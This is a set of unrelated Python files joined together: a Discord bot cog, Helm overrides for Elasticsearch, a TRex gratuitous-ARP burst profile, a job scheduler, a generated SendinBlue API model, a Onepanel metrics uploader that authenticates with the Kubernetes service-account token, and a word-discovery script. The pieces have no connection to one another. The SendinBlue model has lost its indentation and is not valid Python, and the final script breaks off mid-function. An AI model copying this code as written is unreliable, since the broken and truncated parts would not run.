import discord, random, asyncio, chalk
from discord.ext import commands as client
from Cogs.config import conf


class Start(client.Cog):  # Handles the on_ready startup tasks
    def __init__(self, bot):
        self.b = bot

    @client.Cog.listener()
    async def on_ready(self):
        print("\n")
        print(chalk.green(f"[SUCCESS] Connected to Discord as: {self.b.user}"))
        print(chalk.cyan(f"[INFO] Config name: '{conf.name}'"))  # The name defined in the config
        print(chalk.cyan(f"[INFO] Default Prefix: 'Prefix 1: {conf.prefix1} | Prefix 2: {conf.prefix2}'"))  # The two prefixes defined in the config
        print(chalk.cyan(f"[INFO] I'm currently in [{len(self.b.guilds)}] server(s)."))  # How many servers the bot is in
        # Enable triggers on startup for every guild the bot is in; guilds missing
        # from this list are treated as having triggers turned off.
        for guild in self.b.guilds:
            conf.w_tog_on.insert(0, guild.id)
        # Rotate the game activity every 900 seconds
        while True:
            for playing_msg in conf.playing_msg:
                await self.b.change_presence(activity=discord.Game(name=playing_msg))
                await asyncio.sleep(900)

    @client.Cog.listener()
    async def on_guild_join(self, guild):
        conf.w_tog_on.insert(0, guild.id)
        # Remember to add a message here


def setup(bot):
    bot.add_cog(Start(bot))
|
#
# Copyright (c) 2019 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from oslo_log import log as logging
from sysinv.common import exception
from sysinv.common import utils
from sysinv.helm import common
from sysinv.helm import elastic
LOG = logging.getLogger(__name__)
class ElasticsearchHelm(elastic.ElasticBaseHelm):
    """Class to encapsulate helm operations for elasticsearch"""

    CHART = common.HELM_CHART_ELASTICSEARCH

    def get_overrides(self, namespace=None):
        overrides = {
            common.HELM_NS_MONITOR: {
                'cluster': self._get_cluster_overrides(),
                'master': self._get_master_overrides(),
                'data': self._get_data_overrides(),
                'client': self._get_client_overrides(),
            }
        }
        if namespace in self.SUPPORTED_NAMESPACES:
            return overrides[namespace]
        elif namespace:
            raise exception.InvalidHelmNamespace(chart=self.CHART,
                                                 namespace=namespace)
        else:
            return overrides

    def _get_cluster_overrides(self):
        env_vars = {'MINIMUM_MASTER_NODES': "1",
                    'EXPECTED_MASTER_NODES': "1",
                    'RECOVER_AFTER_MASTER_NODES': "1"}
        if utils.is_aio_simplex_system(self.dbapi):
            cluster_initial_master_nodes = ['stx-elasticsearch-master-0']
        else:
            cluster_initial_master_nodes = ['stx-elasticsearch-master-0',
                                            'stx-elasticsearch-master-1']
        conf = {
            'env': env_vars,
            'config': {
                'cluster.initial_master_nodes': cluster_initial_master_nodes},
        }
        return conf

    def _get_master_overrides(self):
        if utils.is_aio_system(self.dbapi):
            heap_size = "256m"
        else:
            heap_size = "512m"
        conf = {
            'replicas':
                self._count_hosts_by_label(common.LABEL_MONITOR_CONTROLLER),
            'heapSize': heap_size,
            'nodeSelector': {common.LABEL_MONITOR_CONTROLLER: "enabled"},
        }
        return conf

    def _get_data_overrides(self):
        # Note: memory values are to be system engineered.
        if utils.is_aio_system(self.dbapi):
            heap_size = "512m"
            memory_size = "512Mi"
        else:
            heap_size = "1536m"
            memory_size = "1536Mi"
        conf = {
            'replicas':
                self._count_hosts_by_label(common.LABEL_MONITOR_DATA),
            'heapSize': heap_size,
            'resources': {
                'limits': {
                    'cpu': "1"
                },
                'requests': {
                    'cpu': "25m",
                    'memory': memory_size,
                },
            },
            'persistence': {'storageClass': 'general',
                            'size': "100Gi"},
            'nodeSelector': {common.LABEL_MONITOR_DATA: "enabled"},
        }
        return conf

    def _get_client_overrides(self):
        if utils.is_aio_system(self.dbapi):
            heap_size = "256m"
        else:
            heap_size = "512m"
        conf = {
            'replicas':
                self._count_hosts_by_label(common.LABEL_MONITOR_CLIENT),
            'heapSize': heap_size,
            'nodeSelector': {common.LABEL_MONITOR_CLIENT: "enabled"},
        }
        return conf
|
from trex_stl_lib.api import *


# send G-ARP (gratuitous ARP) from many clients
# clients are "00:00:dd:dd:00:01+x", psrc="55.55.1.1+x", DG=self.dg
class STLS1(object):

    def __init__(self):
        self.num_clients = 3000  # max is 16 bit

    def create_stream(self):
        # Create base packet and pad it to size
        base_pkt = Ether(src="00:00:dd:dd:00:01", dst="ff:ff:ff:ff:ff:ff") / ARP(psrc="55.55.1.1", hwsrc="00:00:dd:dd:00:01", hwdst="00:00:dd:dd:00:01", pdst="55.55.1.1")
        vm = STLScVmRaw([STLVmFlowVar(name="mac_src", min_value=1, max_value=self.num_clients, size=2, op="inc"),
                         STLVmWrFlowVar(fv_name="mac_src", pkt_offset=10),
                         STLVmWrFlowVar(fv_name="mac_src", pkt_offset="ARP.psrc", offset_fixup=2),
                         STLVmWrFlowVar(fv_name="mac_src", pkt_offset="ARP.hwsrc", offset_fixup=4),
                         STLVmWrFlowVar(fv_name="mac_src", pkt_offset="ARP.pdst", offset_fixup=2),
                         STLVmWrFlowVar(fv_name="mac_src", pkt_offset="ARP.hwdst", offset_fixup=4),
                         ])
        return STLStream(packet=STLPktBuilder(pkt=base_pkt, vm=vm),
                         mode=STLTXSingleBurst(pps=10, total_pkts=self.num_clients))  # single burst of G-ARP

    def get_streams(self, direction=0, **kwargs):
        # create 1 stream
        return [self.create_stream()]


# dynamic load - used for trex console or simulator
def register():
    return STLS1()
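# Usage sketch (assumed file name and port): from the TRex stateless console this
# profile can be loaded with something like
#   start -f stl/garp_burst.py -p 0
# which transmits a single burst of num_clients gratuitous-ARP packets on port 0.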
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: run_job_counter_clear.py
@time: 2018-05-02 10:24
"""
import time
import schedule
from apps.client_rk import counter_clear as job_counter_clear
from tools import catch_keyboard_interrupt
# Reset the counter to zero every day at midnight
schedule.every().day.at('00:00').do(job_counter_clear)


@catch_keyboard_interrupt
def run():
    while True:
        schedule.run_pending()
        time.sleep(1)


if __name__ == '__main__':
    run()
|
# coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501
OpenAPI spec version: 3.0.0
Contact: contact@sendinblue.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetExtendedCampaignOverview(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'int',
'name': 'str',
'subject': 'str',
'type': 'str',
'status': 'str',
'scheduled_at': 'datetime',
'ab_testing': 'bool',
'subject_a': 'str',
'subject_b': 'str',
'split_rule': 'int',
'winner_criteria': 'str',
'winner_delay': 'int',
'send_at_best_time': 'bool',
'test_sent': 'bool',
'header': 'str',
'footer': 'str',
'sender': 'GetExtendedCampaignOverviewSender',
'reply_to': 'str',
'to_field': 'str',
'html_content': 'str',
'share_link': 'str',
'tag': 'str',
'created_at': 'datetime',
'modified_at': 'datetime',
'inline_image_activation': 'bool',
'mirror_active': 'bool',
'recurring': 'bool',
'sent_date': 'datetime',
'return_bounce': 'int'
}
attribute_map = {
'id': 'id',
'name': 'name',
'subject': 'subject',
'type': 'type',
'status': 'status',
'scheduled_at': 'scheduledAt',
'ab_testing': 'abTesting',
'subject_a': 'subjectA',
'subject_b': 'subjectB',
'split_rule': 'splitRule',
'winner_criteria': 'winnerCriteria',
'winner_delay': 'winnerDelay',
'send_at_best_time': 'sendAtBestTime',
'test_sent': 'testSent',
'header': 'header',
'footer': 'footer',
'sender': 'sender',
'reply_to': 'replyTo',
'to_field': 'toField',
'html_content': 'htmlContent',
'share_link': 'shareLink',
'tag': 'tag',
'created_at': 'createdAt',
'modified_at': 'modifiedAt',
'inline_image_activation': 'inlineImageActivation',
'mirror_active': 'mirrorActive',
'recurring': 'recurring',
'sent_date': 'sentDate',
'return_bounce': 'returnBounce'
}
def __init__(self, id=None, name=None, subject=None, type=None, status=None, scheduled_at=None, ab_testing=None, subject_a=None, subject_b=None, split_rule=None, winner_criteria=None, winner_delay=None, send_at_best_time=None, test_sent=None, header=None, footer=None, sender=None, reply_to=None, to_field=None, html_content=None, share_link=None, tag=None, created_at=None, modified_at=None, inline_image_activation=None, mirror_active=None, recurring=None, sent_date=None, return_bounce=None): # noqa: E501
"""GetExtendedCampaignOverview - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._subject = None
self._type = None
self._status = None
self._scheduled_at = None
self._ab_testing = None
self._subject_a = None
self._subject_b = None
self._split_rule = None
self._winner_criteria = None
self._winner_delay = None
self._send_at_best_time = None
self._test_sent = None
self._header = None
self._footer = None
self._sender = None
self._reply_to = None
self._to_field = None
self._html_content = None
self._share_link = None
self._tag = None
self._created_at = None
self._modified_at = None
self._inline_image_activation = None
self._mirror_active = None
self._recurring = None
self._sent_date = None
self._return_bounce = None
self.discriminator = None
self.id = id
self.name = name
if subject is not None:
self.subject = subject
self.type = type
self.status = status
if scheduled_at is not None:
self.scheduled_at = scheduled_at
if ab_testing is not None:
self.ab_testing = ab_testing
if subject_a is not None:
self.subject_a = subject_a
if subject_b is not None:
self.subject_b = subject_b
if split_rule is not None:
self.split_rule = split_rule
if winner_criteria is not None:
self.winner_criteria = winner_criteria
if winner_delay is not None:
self.winner_delay = winner_delay
if send_at_best_time is not None:
self.send_at_best_time = send_at_best_time
self.test_sent = test_sent
self.header = header
self.footer = footer
self.sender = sender
self.reply_to = reply_to
if to_field is not None:
self.to_field = to_field
self.html_content = html_content
if share_link is not None:
self.share_link = share_link
if tag is not None:
self.tag = tag
self.created_at = created_at
self.modified_at = modified_at
if inline_image_activation is not None:
self.inline_image_activation = inline_image_activation
if mirror_active is not None:
self.mirror_active = mirror_active
if recurring is not None:
self.recurring = recurring
if sent_date is not None:
self.sent_date = sent_date
if return_bounce is not None:
self.return_bounce = return_bounce
@property
def id(self):
"""Gets the id of this GetExtendedCampaignOverview. # noqa: E501
ID of the campaign # noqa: E501
:return: The id of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this GetExtendedCampaignOverview.
ID of the campaign # noqa: E501
:param id: The id of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def name(self):
"""Gets the name of this GetExtendedCampaignOverview. # noqa: E501
Name of the campaign # noqa: E501
:return: The name of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this GetExtendedCampaignOverview.
Name of the campaign # noqa: E501
:param name: The name of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def subject(self):
"""Gets the subject of this GetExtendedCampaignOverview. # noqa: E501
Subject of the campaign. Only available if `abTesting` flag of the campaign is `false` # noqa: E501
:return: The subject of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._subject
@subject.setter
def subject(self, subject):
"""Sets the subject of this GetExtendedCampaignOverview.
Subject of the campaign. Only available if `abTesting` flag of the campaign is `false` # noqa: E501
:param subject: The subject of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._subject = subject
@property
def type(self):
"""Gets the type of this GetExtendedCampaignOverview. # noqa: E501
Type of campaign # noqa: E501
:return: The type of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this GetExtendedCampaignOverview.
Type of campaign # noqa: E501
:param type: The type of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if type is None:
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
allowed_values = ["classic", "trigger"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def status(self):
"""Gets the status of this GetExtendedCampaignOverview. # noqa: E501
Status of the campaign # noqa: E501
:return: The status of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this GetExtendedCampaignOverview.
Status of the campaign # noqa: E501
:param status: The status of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
allowed_values = ["draft", "sent", "archive", "queued", "suspended", "in_process"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def scheduled_at(self):
"""Gets the scheduled_at of this GetExtendedCampaignOverview. # noqa: E501
UTC date-time on which campaign is scheduled (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:return: The scheduled_at of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._scheduled_at
@scheduled_at.setter
def scheduled_at(self, scheduled_at):
"""Sets the scheduled_at of this GetExtendedCampaignOverview.
UTC date-time on which campaign is scheduled (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:param scheduled_at: The scheduled_at of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
self._scheduled_at = scheduled_at
@property
def ab_testing(self):
"""Gets the ab_testing of this GetExtendedCampaignOverview. # noqa: E501
Status of A/B Test for the campaign. abTesting = false means it is disabled, & abTesting = true means it is enabled. # noqa: E501
:return: The ab_testing of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._ab_testing
@ab_testing.setter
def ab_testing(self, ab_testing):
"""Sets the ab_testing of this GetExtendedCampaignOverview.
Status of A/B Test for the campaign. abTesting = false means it is disabled, & abTesting = true means it is enabled. # noqa: E501
:param ab_testing: The ab_testing of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._ab_testing = ab_testing
@property
def subject_a(self):
"""Gets the subject_a of this GetExtendedCampaignOverview. # noqa: E501
Subject A of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The subject_a of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._subject_a
@subject_a.setter
def subject_a(self, subject_a):
"""Sets the subject_a of this GetExtendedCampaignOverview.
Subject A of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param subject_a: The subject_a of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._subject_a = subject_a
@property
def subject_b(self):
"""Gets the subject_b of this GetExtendedCampaignOverview. # noqa: E501
Subject B of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The subject_b of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._subject_b
@subject_b.setter
def subject_b(self, subject_b):
"""Sets the subject_b of this GetExtendedCampaignOverview.
Subject B of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param subject_b: The subject_b of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._subject_b = subject_b
@property
def split_rule(self):
"""Gets the split_rule of this GetExtendedCampaignOverview. # noqa: E501
The size of your ab-test groups. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The split_rule of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._split_rule
@split_rule.setter
def split_rule(self, split_rule):
"""Sets the split_rule of this GetExtendedCampaignOverview.
The size of your ab-test groups. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param split_rule: The split_rule of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
self._split_rule = split_rule
@property
def winner_criteria(self):
"""Gets the winner_criteria of this GetExtendedCampaignOverview. # noqa: E501
Criteria for the winning version. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The winner_criteria of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._winner_criteria
@winner_criteria.setter
def winner_criteria(self, winner_criteria):
"""Sets the winner_criteria of this GetExtendedCampaignOverview.
Criteria for the winning version. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param winner_criteria: The winner_criteria of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._winner_criteria = winner_criteria
@property
def winner_delay(self):
"""Gets the winner_delay of this GetExtendedCampaignOverview. # noqa: E501
The duration of the test in hours at the end of which the winning version will be sent. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The winner_delay of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._winner_delay
@winner_delay.setter
def winner_delay(self, winner_delay):
"""Sets the winner_delay of this GetExtendedCampaignOverview.
The duration of the test in hours at the end of which the winning version will be sent. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param winner_delay: The winner_delay of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
self._winner_delay = winner_delay
@property
def send_at_best_time(self):
"""Gets the send_at_best_time of this GetExtendedCampaignOverview. # noqa: E501
It is true if you have chosen to send your campaign at best time, otherwise it is false # noqa: E501
:return: The send_at_best_time of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._send_at_best_time
@send_at_best_time.setter
def send_at_best_time(self, send_at_best_time):
"""Sets the send_at_best_time of this GetExtendedCampaignOverview.
It is true if you have chosen to send your campaign at best time, otherwise it is false # noqa: E501
:param send_at_best_time: The send_at_best_time of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._send_at_best_time = send_at_best_time
@property
def test_sent(self):
"""Gets the test_sent of this GetExtendedCampaignOverview. # noqa: E501
Retrieved the status of test email sending. (true=Test email has been sent false=Test email has not been sent) # noqa: E501
:return: The test_sent of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._test_sent
@test_sent.setter
def test_sent(self, test_sent):
"""Sets the test_sent of this GetExtendedCampaignOverview.
Retrieved the status of test email sending. (true=Test email has been sent false=Test email has not been sent) # noqa: E501
:param test_sent: The test_sent of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
if test_sent is None:
raise ValueError("Invalid value for `test_sent`, must not be `None`") # noqa: E501
self._test_sent = test_sent
@property
def header(self):
"""Gets the header of this GetExtendedCampaignOverview. # noqa: E501
Header of the campaign # noqa: E501
:return: The header of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._header
@header.setter
def header(self, header):
"""Sets the header of this GetExtendedCampaignOverview.
Header of the campaign # noqa: E501
:param header: The header of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if header is None:
raise ValueError("Invalid value for `header`, must not be `None`") # noqa: E501
self._header = header
@property
def footer(self):
"""Gets the footer of this GetExtendedCampaignOverview. # noqa: E501
Footer of the campaign # noqa: E501
:return: The footer of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._footer
@footer.setter
def footer(self, footer):
"""Sets the footer of this GetExtendedCampaignOverview.
Footer of the campaign # noqa: E501
:param footer: The footer of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if footer is None:
raise ValueError("Invalid value for `footer`, must not be `None`") # noqa: E501
self._footer = footer
@property
def sender(self):
"""Gets the sender of this GetExtendedCampaignOverview. # noqa: E501
:return: The sender of this GetExtendedCampaignOverview. # noqa: E501
:rtype: GetExtendedCampaignOverviewSender
"""
return self._sender
@sender.setter
def sender(self, sender):
"""Sets the sender of this GetExtendedCampaignOverview.
:param sender: The sender of this GetExtendedCampaignOverview. # noqa: E501
:type: GetExtendedCampaignOverviewSender
"""
if sender is None:
raise ValueError("Invalid value for `sender`, must not be `None`") # noqa: E501
self._sender = sender
@property
def reply_to(self):
"""Gets the reply_to of this GetExtendedCampaignOverview. # noqa: E501
Email defined as the \"Reply to\" of the campaign # noqa: E501
:return: The reply_to of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._reply_to
@reply_to.setter
def reply_to(self, reply_to):
"""Sets the reply_to of this GetExtendedCampaignOverview.
Email defined as the \"Reply to\" of the campaign # noqa: E501
:param reply_to: The reply_to of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if reply_to is None:
raise ValueError("Invalid value for `reply_to`, must not be `None`") # noqa: E501
self._reply_to = reply_to
@property
def to_field(self):
"""Gets the to_field of this GetExtendedCampaignOverview. # noqa: E501
Customisation of the \"to\" field of the campaign # noqa: E501
:return: The to_field of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._to_field
@to_field.setter
def to_field(self, to_field):
"""Sets the to_field of this GetExtendedCampaignOverview.
Customisation of the \"to\" field of the campaign # noqa: E501
:param to_field: The to_field of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._to_field = to_field
@property
def html_content(self):
"""Gets the html_content of this GetExtendedCampaignOverview. # noqa: E501
HTML content of the campaign # noqa: E501
:return: The html_content of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._html_content
@html_content.setter
def html_content(self, html_content):
"""Sets the html_content of this GetExtendedCampaignOverview.
HTML content of the campaign # noqa: E501
:param html_content: The html_content of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if html_content is None:
raise ValueError("Invalid value for `html_content`, must not be `None`") # noqa: E501
self._html_content = html_content
@property
def share_link(self):
"""Gets the share_link of this GetExtendedCampaignOverview. # noqa: E501
Link to share the campaign on social medias # noqa: E501
:return: The share_link of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._share_link
@share_link.setter
def share_link(self, share_link):
"""Sets the share_link of this GetExtendedCampaignOverview.
Link to share the campaign on social medias # noqa: E501
:param share_link: The share_link of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._share_link = share_link
@property
def tag(self):
"""Gets the tag of this GetExtendedCampaignOverview. # noqa: E501
Tag of the campaign # noqa: E501
:return: The tag of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._tag
@tag.setter
def tag(self, tag):
"""Sets the tag of this GetExtendedCampaignOverview.
Tag of the campaign # noqa: E501
:param tag: The tag of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._tag = tag
@property
def created_at(self):
"""Gets the created_at of this GetExtendedCampaignOverview. # noqa: E501
Creation UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:return: The created_at of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this GetExtendedCampaignOverview.
Creation UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:param created_at: The created_at of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
if created_at is None:
raise ValueError("Invalid value for `created_at`, must not be `None`") # noqa: E501
self._created_at = created_at
@property
def modified_at(self):
"""Gets the modified_at of this GetExtendedCampaignOverview. # noqa: E501
UTC date-time of last modification of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:return: The modified_at of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._modified_at
@modified_at.setter
def modified_at(self, modified_at):
"""Sets the modified_at of this GetExtendedCampaignOverview.
UTC date-time of last modification of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:param modified_at: The modified_at of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
if modified_at is None:
raise ValueError("Invalid value for `modified_at`, must not be `None`") # noqa: E501
self._modified_at = modified_at
@property
def inline_image_activation(self):
"""Gets the inline_image_activation of this GetExtendedCampaignOverview. # noqa: E501
Status of inline image. inlineImageActivation = false means image can’t be embedded, & inlineImageActivation = true means image can be embedded, in the email. # noqa: E501
:return: The inline_image_activation of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._inline_image_activation
@inline_image_activation.setter
def inline_image_activation(self, inline_image_activation):
"""Sets the inline_image_activation of this GetExtendedCampaignOverview.
Status of inline image. inlineImageActivation = false means image can’t be embedded, & inlineImageActivation = true means image can be embedded, in the email. # noqa: E501
:param inline_image_activation: The inline_image_activation of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._inline_image_activation = inline_image_activation
@property
def mirror_active(self):
"""Gets the mirror_active of this GetExtendedCampaignOverview. # noqa: E501
Status of mirror links in campaign. mirrorActive = false means mirror links are deactivated, & mirrorActive = true means mirror links are activated, in the campaign # noqa: E501
:return: The mirror_active of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._mirror_active
@mirror_active.setter
def mirror_active(self, mirror_active):
"""Sets the mirror_active of this GetExtendedCampaignOverview.
Status of mirror links in campaign. mirrorActive = false means mirror links are deactivated, & mirrorActive = true means mirror links are activated, in the campaign # noqa: E501
:param mirror_active: The mirror_active of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._mirror_active = mirror_active
@property
def recurring(self):
"""Gets the recurring of this GetExtendedCampaignOverview. # noqa: E501
FOR TRIGGER ONLY ! Type of trigger campaign.recurring = false means contact can receive the same Trigger campaign only once, & recurring = true means contact can receive the same Trigger campaign several times # noqa: E501
:return: The recurring of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._recurring
@recurring.setter
def recurring(self, recurring):
"""Sets the recurring of this GetExtendedCampaignOverview.
FOR TRIGGER ONLY ! Type of trigger campaign.recurring = false means contact can receive the same Trigger campaign only once, & recurring = true means contact can receive the same Trigger campaign several times # noqa: E501
:param recurring: The recurring of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._recurring = recurring
@property
def sent_date(self):
"""Gets the sent_date of this GetExtendedCampaignOverview. # noqa: E501
Sent UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ). Only available if 'status' of the campaign is 'sent' # noqa: E501
:return: The sent_date of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._sent_date
@sent_date.setter
def sent_date(self, sent_date):
"""Sets the sent_date of this GetExtendedCampaignOverview.
Sent UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ). Only available if 'status' of the campaign is 'sent' # noqa: E501
:param sent_date: The sent_date of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
self._sent_date = sent_date
@property
def return_bounce(self):
"""Gets the return_bounce of this GetExtendedCampaignOverview. # noqa: E501
Total number of non-delivered campaigns for a particular campaign id. # noqa: E501
:return: The return_bounce of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._return_bounce
@return_bounce.setter
def return_bounce(self, return_bounce):
"""Sets the return_bounce of this GetExtendedCampaignOverview.
Total number of non-delivered campaigns for a particular campaign id. # noqa: E501
:param return_bounce: The return_bounce of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
self._return_bounce = return_bounce
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(GetExtendedCampaignOverview, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetExtendedCampaignOverview):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
import os
import json
import argparse
import onepanel.core.api
from onepanel.core.api.models.metric import Metric
from onepanel.core.api.rest import ApiException
from onepanel.core.api.models import Parameter
def main(args):
    # Load Task A metrics
    with open(args.from_file) as f:
        metrics = json.load(f)
    with open('/var/run/secrets/kubernetes.io/serviceaccount/token') as f:
        token = f.read()
    # Configure API authorization
    configuration = onepanel.core.api.Configuration(
        host=os.getenv('ONEPANEL_API_URL'),
        api_key={
            'authorization': token
        }
    )
    configuration.api_key_prefix['authorization'] = 'Bearer'
    # Call SDK method to save metrics
    with onepanel.core.api.ApiClient(configuration) as api_client:
        api_instance = onepanel.core.api.WorkflowServiceApi(api_client)
        namespace = os.getenv('ONEPANEL_RESOURCE_NAMESPACE')
        uid = os.getenv('ONEPANEL_RESOURCE_UID')
        body = onepanel.core.api.AddWorkflowExecutionsMetricsRequest()
        body.metrics = metrics
        try:
            api_response = api_instance.add_workflow_execution_metrics(namespace, uid, body)
            print('Metrics added.')
        except ApiException as e:
            print('Exception when calling WorkflowServiceApi->add_workflow_execution_metrics: %s\n' % e)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--from_file', help='JSON file containing metrics.', required=True)
    main(parser.parse_args())
|
# -*- encoding:utf-8 -*-
"""
* Copyright (C) 2017 OwnThink.
*
* Name : findword.py - new word discovery
* Author : Yener <yener@ownthink.com>
* Version : 0.01
* Description : implementation of a new-word discovery algorithm
special thanks to
http://www.matrix67.com/blog/archives/5044
https://github.com/zoulala/New_words_find
"""
import re
from math import log
from collections import Counter
max_word_len = 6
re_chinese = re.compile(r"[\w]+", re.U)
def count_words(input_file):
    word_freq = Counter()
    fin = open(input_file, 'r', encoding='utf8')
    for index, line in enumerate(fin):
        words = []
